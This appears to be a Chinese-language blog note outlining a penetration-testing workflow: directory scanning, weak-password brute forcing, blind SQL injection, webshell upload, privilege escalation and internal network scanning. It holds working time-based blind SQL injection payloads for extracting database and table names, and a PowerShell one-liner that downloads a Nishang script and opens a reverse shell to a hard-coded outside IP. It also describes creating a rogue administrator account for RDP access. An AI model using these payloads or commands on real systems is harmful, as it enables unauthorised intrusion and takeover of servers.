好的工具
渗透测试工具、网络安全工具、用于渗透测试和安全审计的工具
流程
Web 端
社工
目录扫描:Dirsearch
找到一些网站的 cms 然后查看其有信息泄漏的网址
弱口令
这部分就是找到 admin 后台,然后常用弱口令或者该 cms 的后台默认密码。如果想爆破的话,就要利用社工手段然后用 crunch 生成字典进行爆破。
爆破常用的工具:九头蛇、msf …
SQL inject
发现注入点
没有回显的就常规盲注、时间盲注
常用函数和语句
1 | benchmark(50000000,md5(1212)) |
爆破数据库名字:1\%' AND if(ascii(mid(database(),4,1))=121,benchmark(10000000,md5(0x41)),1) AND '\%'='
爆破表名字:1\%' AND if(ascii(mid((select+table_name from information_schema.tables where table_schema='mysql' limit 0,1),1,1))=99,1,benchmark(10000000,md5(0x41))) AND '\%'='
其中 mysql 是数据库名字
get shell
上传点拿到 shell
再获得 webshell 的前提下,利用 msf 提权,获得 web 跳板机管理员权限。
然后用蚁剑连接,接着反弹 shell 整一个☝️。
1 | powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 106.12.88.124 -port 6666 |
为什么这里要用反弹 shell 呢?因为 webshell 是非交互式 shell,反弹的 shell 是交互式的 shell。请看:https://blog.csdn.net/redwand/article/details/105791548
最后开启 RDP 连接之,当时我们一直无法爆破出 admin 的密码,然后就新建立了一个账户,加入管理员组。
内网
等拿到外网 Web 服务器权限后,第一件事就是稍微维持一下权限(其实这个不太会)。然后就是在这台机器上寻找到有价值的信息,很多管理员会将重要的信息放在服务器的桌面上……
巡风内网扫描器
nmap 进行了内网的扫描,发现了一些内网主机。
内网穿透
先到这,后面再来补